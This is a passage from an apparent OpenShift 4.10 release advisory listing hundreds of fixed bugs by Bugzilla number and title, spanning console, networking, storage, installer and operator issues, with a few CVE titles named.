alerts\n2015395 - Table head on Affinity Rules modal is not fully expanded\n2015416 - CI implementation for Topology plugin\n2015418 - Project Filesystem query returns No datapoints found\n2015420 - No vm resource in project view\u0027s inventory\n2015422 - No conflict checking on snapshot name\n2015472 - Form and YAML view switch button should have distinguishable status\n2015481 - [4.10] sriov-network-operator daemon pods are failing to start\n2015493 - Cloud Controller Manager Operator does not respect \u0027additionalTrustBundle\u0027 setting\n2015496 - Storage - PersistentVolumes : Claim colum value \u0027No Claim\u0027 in English\n2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on \u0027Add Capacity\u0027 button click\n2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu\n2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain. \n2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart \u0027x% used\u0027 is in English\n2015549 - Observe - Metrics: Column heading and pagination text is in English\n2015557 - Workloads - DeploymentConfigs : Error message is in English\n2015568 - Compute - Nodes : CPU column\u0027s values are in English\n2015635 - Storage operator fails causing installation to fail on ASH\n2015660 - \"Finishing boot source customization\" screen should not use term \"patched\"\n2015793 - [hypershift] The collect-profiles job\u0027s pods should run on the control-plane node\n2015806 - Metrics view in Deployment reports \"Forbidden\" when not cluster-admin\n2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning\n2015837 - OS_CLOUD overwrites install-config\u0027s platform.openstack.cloud\n2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch\n2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail\n2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)\n2016008 - [4.10] Bootimage bump tracker\n2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver\n2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator\n2016054 - No e2e CI presubmit configured for release component cluster-autoscaler\n2016055 - No e2e CI presubmit configured for release component console\n2016058 - openshift-sync does not synchronise in \"ose-jenkins:v4.8\"\n2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager\n2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers\n2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters. \n2016179 - Add Sprint 208 translations\n2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager\n2016235 - should update to 7.5.11 for grafana resources version label\n2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails\n2016334 - shiftstack: SRIOV nic reported as not supported\n2016352 - Some pods start before CA resources are present\n2016367 - Empty task box is getting created for a pipeline without finally task\n2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts\n2016438 - Feature flag gating is missing in few extensions contributed via knative plugin\n2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc\n2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets\n2016453 - Complete i18n for GaugeChart defaults\n2016479 - iface-id-ver is not getting updated for existing lsp\n2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear\n2016951 - dynamic actions list is not disabling \"open console\" for stopped vms\n2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available\n2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances\n2017016 - [REF] Virtualization menu\n2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn\n2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly\n2017130 - t is not a function error navigating to details page\n2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue\n2017244 - ovirt csi operator static files creation is in the wrong order\n2017276 - [4.10] Volume mounts not created with the correct security context\n2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed. \n2017427 - NTO does not restart TuneD daemon when profile application is taking too long\n2017535 - Broken Argo CD link image on GitOps Details Page\n2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references\n2017564 - On-prem prepender dispatcher script overwrites DNS search settings\n2017565 - CCMO does not handle additionalTrustBundle on Azure Stack\n2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice\n2017606 - [e2e][automation] add test to verify send key for VNC console\n2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes\n2017656 - VM IP address is \"undefined\" under VM details -\u003e ssh field\n2017663 - SSH password authentication is disabled when public key is not supplied\n2017680 - [gcp] Couldn\u2019t enable support for instances with GPUs on GCP\n2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set\n2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource\n2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults\n2017761 - [e2e][automation] dummy bug for 4.9 test dependency\n2017872 - Add Sprint 209 translations\n2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances\n2017879 - Add Chinese translation for \"alternate\"\n2017882 - multus: add handling of pod UIDs passed from runtime\n2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods\n2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI\n2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS\n2018094 - the tooltip length is limited\n2018152 - CNI pod is not restarted when It cannot start servers due to ports being used\n2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time\n2018234 - user settings are saved in local storage instead of on cluster\n2018264 - Delete Export button doesn\u0027t work in topology sidebar (general issue with unknown CSV?)\n2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)\n2018275 - Topology graph doesn\u0027t show context menu for Export CSV\n2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked\n2018380 - Migrate docs links to access.redhat.com\n2018413 - Error: context deadline exceeded, OCP 4.8.9\n2018428 - PVC is deleted along with VM even with \"Delete Disks\" unchecked\n2018445 - [e2e][automation] enhance tests for downstream\n2018446 - [e2e][automation] move tests to different level\n2018449 - [e2e][automation] add test about create/delete network attachment definition\n2018490 - [4.10] Image provisioning fails with file name too long\n2018495 - Fix typo in internationalization README\n2018542 - Kernel upgrade does not reconcile DaemonSet\n2018880 - Get \u0027No datapoints found.\u0027 when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit\n2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes\n2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950\n2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10\n2018985 - The rootdisk size is 15Gi of windows VM in customize wizard\n2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync. \n2019096 - Update SRO leader election timeout to support SNO\n2019129 - SRO in operator hub points to wrong repo for README\n2019181 - Performance profile does not apply\n2019198 - ptp offset metrics are not named according to the log output\n2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest\n2019284 - Stop action should not in the action list while VMI is not running\n2019346 - zombie processes accumulation and Argument list too long\n2019360 - [RFE] Virtualization Overview page\n2019452 - Logger object in LSO appends to existing logger recursively\n2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect\n2019634 - Pause and migration is enabled in action list for a user who has view only permission\n2019636 - Actions in VM tabs should be disabled when user has view only permission\n2019639 - \"Take snapshot\" should be disabled while VM image is still been importing\n2019645 - Create button is not removed on \"Virtual Machines\" page for view only user\n2019646 - Permission error should pop-up immediately while clicking \"Create VM\" button on template page for view only user\n2019647 - \"Remove favorite\" and \"Create new Template\" should be disabled in template action list for view only user\n2019717 - cant delete VM with un-owned pvc attached\n2019722 - The shared-resource-csi-driver-node pod runs as \u201cBestEffort\u201d qosClass\n2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as \"Always\"\n2019744 - [RFE] Suggest users to download newest RHEL 8 version\n2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level\n2019827 - Display issue with top-level menu items running demo plugin\n2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded\n2019886 - Kuryr unable to finish ports recovery upon controller restart\n2019948 - [RFE] Restructring Virtualization links\n2019972 - The Nodes section doesn\u0027t display the csr of the nodes that are trying to join the cluster\n2019977 - Installer doesn\u0027t validate region causing binary to hang with a 60 minute timeout\n2019986 - Dynamic demo plugin fails to build\n2019992 - instance:node_memory_utilisation:ratio metric is incorrect\n2020001 - Update dockerfile for demo dynamic plugin to reflect dir change\n2020003 - MCD does not regard \"dangling\" symlinks as a files, attempts to write through them on next backup, resulting in \"not writing through dangling symlink\" error and degradation. \n2020107 - cluster-version-operator: remove runlevel from CVO namespace\n2020153 - Creation of Windows high performance VM fails\n2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn\u0027t be public\n2020250 - Replacing deprecated ioutil\n2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build\n2020275 - ClusterOperators link in console returns blank page during upgrades\n2020377 - permissions error while using tcpdump option with must-gather\n2020489 - coredns_dns metrics don\u0027t include the custom zone metrics data due to CoreDNS prometheus plugin is not defined\n2020498 - \"Show PromQL\" button is disabled\n2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature\n2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI\n2020664 - DOWN subports are not cleaned up\n2020904 - When trying to create a connection from the Developer view between VMs, it fails\n2021016 - \u0027Prometheus Stats\u0027 of dashboard \u0027Prometheus Overview\u0027 miss data on console compared with Grafana\n2021017 - 404 page not found error on knative eventing page\n2021031 - QE - Fix the topology CI scripts\n2021048 - [RFE] Added MAC Spoof check\n2021053 - Metallb operator presented as community operator\n2021067 - Extensive number of requests from storage version operator in cluster\n2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes\n2021135 - [azure-file-csi-driver] \"make unit-test\" returns non-zero code, but tests pass\n2021141 - Cluster should allow a fast rollout of kube-apiserver is failing on single node\n2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating\n2021152 - imagePullPolicy is \"Always\" for ptp operator images\n2021191 - Project admins should be able to list available network attachment defintions\n2021205 - Invalid URL in git import form causes validation to not happen on URL change\n2021322 - cluster-api-provider-azure should populate purchase plan information\n2021337 - Dynamic Plugins: ResourceLink doesn\u0027t render when passed a groupVersionKind\n2021364 - Installer requires invalid AWS permission s3:GetBucketReplication\n2021400 - Bump documentationBaseURL to 4.10\n2021405 - [e2e][automation] VM creation wizard Cloud Init editor\n2021433 - \"[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified\" test fail permanently on disconnected\n2021466 - [e2e][automation] Windows guest tool mount\n2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver\n2021551 - Build is not recognizing the USER group from an s2i image\n2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character\n2021629 - api request counts for current hour are incorrect\n2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page\n2021693 - Modals assigned modal-lg class are no longer the correct width\n2021724 - Observe \u003e Dashboards: Graph lines are not visible when obscured by other lines\n2021731 - CCO occasionally down, reporting networksecurity.googleapis.com API as disabled\n2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags\n2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem\n2022053 - dpdk application with vhost-net is not able to start\n2022114 - Console logging every proxy request\n2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)\n2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long\n2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error . \n2022447 - ServiceAccount in manifests conflicts with OLM\n2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules. \n2022509 - getOverrideForManifest does not check manifest.GVK.Group\n2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache\n2022612 - no namespace field for \"Kubernetes / Compute Resources / Namespace (Pods)\" admin console dashboard\n2022627 - Machine object not picking up external FIP added to an openstack vm\n2022646 - configure-ovs.sh failure - Error: unknown connection \u0027WARN:\u0027\n2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox\n2022801 - Add Sprint 210 translations\n2022811 - Fix kubelet log rotation file handle leak\n2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations\n2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests\n2022880 - Pipeline renders with minor visual artifact with certain task dependencies\n2022886 - Incorrect URL in operator description\n2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config\n2023060 - [e2e][automation] Windows VM with CDROM migration\n2023077 - [e2e][automation] Home Overview Virtualization status\n2023090 - [e2e][automation] Examples of Import URL for VM templates\n2023102 - [e2e][automation] Cloudinit disk of VM from custom template\n2023216 - ACL for a deleted egressfirewall still present on node join switch\n2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9\n2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy\n2023342 - SCC admission should take ephemeralContainers into account\n2023356 - Devfiles can\u0027t be loaded in Safari on macOS (403 - Forbidden)\n2023434 - Update Azure Machine Spec API to accept Marketplace Images\n2023500 - Latency experienced while waiting for volumes to attach to node\n2023522 - can\u0027t remove package from index: database is locked\n2023560 - \"Network Attachment Definitions\" has no project field on the top in the list view\n2023592 - [e2e][automation] add mac spoof check for nad\n2023604 - ACL violation when deleting a provisioning-configuration resource\n2023607 - console returns blank page when normal user without any projects visit Installed Operators page\n2023638 - Downgrade support level for extended control plane integration to Dev Preview\n2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10\n2023675 - Changing CNV Namespace\n2023779 - Fix Patch 104847 in 4.9\n2023781 - initial hardware devices is not loading in wizard\n2023832 - CCO updates lastTransitionTime for non-Status changes\n2023839 - Bump recommended FCOS to 34.20211031.3.0\n2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly\n2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from \"registry:5000\" repository\n2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8\n2024055 - External DNS added extra prefix for the TXT record\n2024108 - Occasionally node remains in SchedulingDisabled state even after update has been completed sucessfully\n2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json\n2024199 - 400 Bad Request error for some queries for the non admin user\n2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode\n2024262 - Sample catalog is not displayed when one API call to the backend fails\n2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability\n2024316 - modal about support displays wrong annotation\n2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected\n2024399 - Extra space is in the translated text of \"Add/Remove alternate service\" on Create Route page\n2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view\n2024493 - Observe \u003e Alerting \u003e Alerting rules page throws error trying to destructure undefined\n2024515 - test-blocker: Ceph-storage-plugin tests failing\n2024535 - hotplug disk missing OwnerReference\n2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image\n2024547 - Detail page is breaking for namespace store , backing store and bucket class. \n2024551 - KMS resources not getting created for IBM FlashSystem storage\n2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel\n2024613 - pod-identity-webhook starts without tls\n2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded\n2024665 - Bindable services are not shown on topology\n2024731 - linuxptp container: unnecessary checking of interfaces\n2024750 - i18n some remaining OLM items\n2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured\n2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack\n2024841 - test Keycloak with latest tag\n2024859 - Not able to deploy an existing image from private image registry using developer console\n2024880 - Egress IP breaks when network policies are applied\n2024900 - Operator upgrade kube-apiserver\n2024932 - console throws \"Unauthorized\" error after logging out\n2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up\n2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick\n2025230 - ClusterAutoscalerUnschedulablePods should not be a warning\n2025266 - CreateResource route has exact prop which need to be removed\n2025301 - [e2e][automation] VM actions availability in different VM states\n2025304 - overwrite storage section of the DV spec instead of the pvc section\n2025431 - [RFE]Provide specific windows source link\n2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36\n2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node\n2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn\u0027t work for ExternalTrafficPolicy=local\n2025481 - Update VM Snapshots UI\n2025488 - [DOCS] Update the doc for nmstate operator installation\n2025592 - ODC 4.9 supports invalid devfiles only\n2025765 - It should not try to load from storageProfile after unchecking\"Apply optimized StorageProfile settings\"\n2025767 - VMs orphaned during machineset scaleup\n2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns \"kubevirt-hyperconverged\" while using customize wizard\n2025788 - [IPI on azure]Pre-check on IPI Azure, should check VM Size\u2019s vCPUsAvailable instead of vCPUs for the sku. \n2025821 - Make \"Network Attachment Definitions\" available to regular user\n2025823 - The console nav bar ignores plugin separator in existing sections\n2025830 - CentOS capitalizaion is wrong\n2025837 - Warn users that the RHEL URL expire\n2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-*\n2025903 - [UI] RoleBindings tab doesn\u0027t show correct rolebindings\n2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2026178 - OpenShift Alerting Rules Style-Guide Compliance\n2026209 - Updation of task is getting failed (tekton hub integration)\n2026223 - Internal error occurred: failed calling webhook \"ptpconfigvalidationwebhook.openshift.io\"\n2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates\n2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct\n2026352 - Kube-Scheduler revision-pruner fail during install of new cluster\n2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment\n2026383 - Error when rendering custom Grafana dashboard through ConfigMap\n2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation\n2026396 - Cachito Issues: sriov-network-operator Image build failure\n2026488 - openshift-controller-manager - delete event is repeating pathologically\n2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined. \n2026560 - Cluster-version operator does not remove unrecognized volume mounts\n2026699 - fixed a bug with missing metadata\n2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator\n2026898 - Description/details are missing for Local Storage Operator\n2027132 - Use the specific icon for Fedora and CentOS template\n2027238 - \"Node Exporter / USE Method / Cluster\" CPU utilization graph shows incorrect legend\n2027272 - KubeMemoryOvercommit alert should be human readable\n2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group\n2027288 - Devfile samples can\u0027t be loaded after fixing it on Safari (redirect caching issue)\n2027299 - The status of checkbox component is not revealed correctly in code\n2027311 - K8s watch hooks do not work when fetching core resources\n2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation\n2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don\u0027t use the downstream images\n2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation\n2027498 - [IBMCloud] SG Name character length limitation\n2027501 - [4.10] Bootimage bump tracker\n2027524 - Delete Application doesn\u0027t delete Channels or Brokers\n2027563 - e2e/add-flow-ci.feature fix accessibility violations\n2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges\n2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions\n2027685 - openshift-cluster-csi-drivers pods crashing on PSI\n2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced\n2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string\n2027917 - No settings in hostfirmwaresettings and schema objects for masters\n2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf\n2027982 - nncp stucked at ConfigurationProgressing\n2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters\n2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed\n2028030 - Panic detected in cluster-image-registry-operator pod\n2028042 - Desktop viewer for Windows VM shows \"no Service for the RDP (Remote Desktop Protocol) can be found\"\n2028054 - Cloud controller manager operator can\u0027t get leader lease when upgrading from 4.8 up to 4.9\n2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin\n2028141 - Console tests doesn\u0027t pass on Node.js 15 and 16\n2028160 - Remove i18nKey in network-policy-peer-selectors.tsx\n2028162 - Add Sprint 210 translations\n2028170 - Remove leading and trailing whitespace\n2028174 - Add Sprint 210 part 2 translations\n2028187 - Console build doesn\u0027t pass on Node.js 16 because node-sass doesn\u0027t support it\n2028217 - Cluster-version operator does not default Deployment replicas to one\n2028240 - Multiple CatalogSources causing higher CPU use than necessary\n2028268 - Password parameters are listed in FirmwareSchema in spite that cannot and shouldn\u0027t be set in HostFirmwareSettings\n2028325 - disableDrain should be set automatically on SNO\n2028484 - AWS EBS CSI driver\u0027s livenessprobe does not respect operator\u0027s loglevel\n2028531 - Missing netFilter to the list of parameters when platform is OpenStack\n2028610 - Installer doesn\u0027t retry on GCP rate limiting\n2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting\n2028695 - destroy cluster does not prune bootstrap instance profile\n2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs\n2028802 - CRI-O panic due to invalid memory address or nil pointer dereference\n2028816 - VLAN IDs not released on failures\n2028881 - Override not working for the PerformanceProfile template\n2028885 - Console should show an error context if it logs an error object\n2028949 - Masthead dropdown item hover text color is incorrect\n2028963 - Whereabouts should reconcile stranded IP addresses\n2029034 - enabling ExternalCloudProvider leads to inoperative cluster\n2029178 - Create VM with wizard - page is not displayed\n2029181 - Missing CR from PGT\n2029273 - wizard is not able to use if project field is \"All Projects\"\n2029369 - Cypress tests github rate limit errors\n2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out\n2029394 - missing empty text for hardware devices at wizard review\n2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used\n2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl\n2029521 - EFS CSI driver cannot delete volumes under load\n2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle\n2029579 - Clicking on an Application which has a Helm Release in it causes an error\n2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn\u0027t for HPE\n2029645 - Sync upstream 1.15.0 downstream\n2029671 - VM action \"pause\" and \"clone\" should be disabled while VM disk is still being importing\n2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip\n2029750 - cvo keep restart due to it fail to get feature gate value during the initial start stage\n2029785 - CVO panic when an edge is included in both edges and conditionaledges\n2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)\n2030003 - HFS CRD: Attempt to set Integer parameter to not-numeric string value - no error\n2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace\n2030228 - Fix StorageSpec resources field to use correct API\n2030229 - Mirroring status card reflect wrong data\n2030240 - Hide overview page for non-privileged user\n2030305 - Export App job do not completes\n2030347 - kube-state-metrics exposes metrics about resource annotations\n2030364 - Shared resource CSI driver monitoring is not setup correctly\n2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets\n2030534 - Node selector/tolerations rules are evaluated too early\n2030539 - Prometheus is not highly available\n2030556 - Don\u0027t display Description or Message fields for alerting rules if those annotations are missing\n2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation\n2030574 - console service uses older \"service.alpha.openshift.io\" for the service serving certificates. \n2030677 - BOND CNI: There is no option to configure MTU on a Bond interface\n2030692 - NPE in PipelineJobListener.upsertWorkflowJob\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2030847 - PerformanceProfile API version should be v2\n2030961 - Customizing the OAuth server URL does not apply to upgraded cluster\n2031006 - Application name input field is not autofocused when user selects \"Create application\"\n2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex\n2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn\u0027t be started\n2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue\n2031057 - Topology sidebar for Knative services shows a small pod ring with \"0 undefined\" as tooltip\n2031060 - Failing CSR Unit test due to expired test certificate\n2031085 - ovs-vswitchd running more threads than expected\n2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2031502 - [RFE] New common templates crash the ui\n2031685 - Duplicated forward upstreams should be removed from the dns operator\n2031699 - The displayed ipv6 address of a dns upstream should be case sensitive\n2031797 - [RFE] Order and text of Boot source type input are wrong\n2031826 - CI tests needed to confirm driver-toolkit image contents\n2031831 - OCP Console - Global CSS overrides affecting dynamic plugins\n2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional\n2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)\n2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)\n2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself\n2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource\n2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff due to the image is built on linux+amd64\n2032141 - open the alertrule link in new tab, got empty page\n2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy\n2032296 - Cannot create machine with ephemeral disk on Azure\n2032407 - UI will show the default openshift template wizard for HANA template\n2032415 - Templates page - remove \"support level\" badge and add \"support level\" column which should not be hard coded\n2032421 - [RFE] UI integration with automatic updated images\n2032516 - Not able to import git repo with .devfile.yaml\n2032521 - openshift-installer intermittent failure on AWS with \"Error: Provider produced inconsistent result after apply\" when creating the aws_vpc_dhcp_options_association resource\n2032547 - hardware devices table have filter when table is empty\n2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool\n2032566 - Cluster-ingress-router does not support Azure Stack\n2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso\n2032589 - DeploymentConfigs ignore resolve-names annotation\n2032732 - Fix styling conflicts due to recent console-wide CSS changes\n2032831 - Knative Services and Revisions are not shown when Service has no ownerReference\n2032851 - Networking is \"not available\" in Virtualization Overview\n2032926 - Machine API components should use K8s 1.23 dependencies\n2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24\n2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster\n2033013 - Project dropdown in user preferences page is broken\n2033044 - Unable to change import strategy if devfile is invalid\n2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable\n2033111 - IBM VPC operator library bump removed global CLI args\n2033138 - \"No model registered for Templates\" shows on customize wizard\n2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected\n2033239 - [IPI on Alibabacloud] \u0027openshift-install\u0027 gets the wrong region (\u2018cn-hangzhou\u2019) selected\n2033257 - unable to use configmap for helm charts\n2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn\u2019t triggered\n2033290 - Product builds for console are failing\n2033382 - MAPO is missing machine annotations\n2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations\n2033403 - Devfile catalog does not show provider information\n2033404 - Cloud event schema is missing source type and resource field is using wrong value\n2033407 - Secure route data is not pre-filled in edit flow form\n2033422 - CNO not allowing LGW conversion from SGW in runtime\n2033434 - Offer darwin/arm64 oc in clidownloads\n2033489 - CCM operator failing on baremetal platform\n2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver\n2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains\n2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating \"cluster-infrastructure-02-config.yml\" status, which leads to bootstrap failed and all master nodes NotReady\n2033538 - Gather Cost Management Metrics Custom Resource\n2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined\n2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page\n2033634 - list-style-type: disc is applied to the modal dropdowns\n2033720 - Update samples in 4.10\n2033728 - Bump OVS to 2.16.0-33\n2033729 - remove runtime request timeout restriction for azure\n2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended\n2033749 - Azure Stack Terraform fails without Local Provider\n2033750 - Local volume should pull multi-arch image for kube-rbac-proxy\n2033751 - Bump kubernetes to 1.23\n2033752 - make verify fails due to missing yaml-patch\n2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource\n2034004 - [e2e][automation] add tests for VM snapshot improvements\n2034068 - [e2e][automation] Enhance tests for 4.10 downstream\n2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore\n2034097 - [OVN] After edit EgressIP object, the status is not correct\n2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning\n2034129 - blank page returned when clicking \u0027Get started\u0027 button\n2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0\n2034153 - 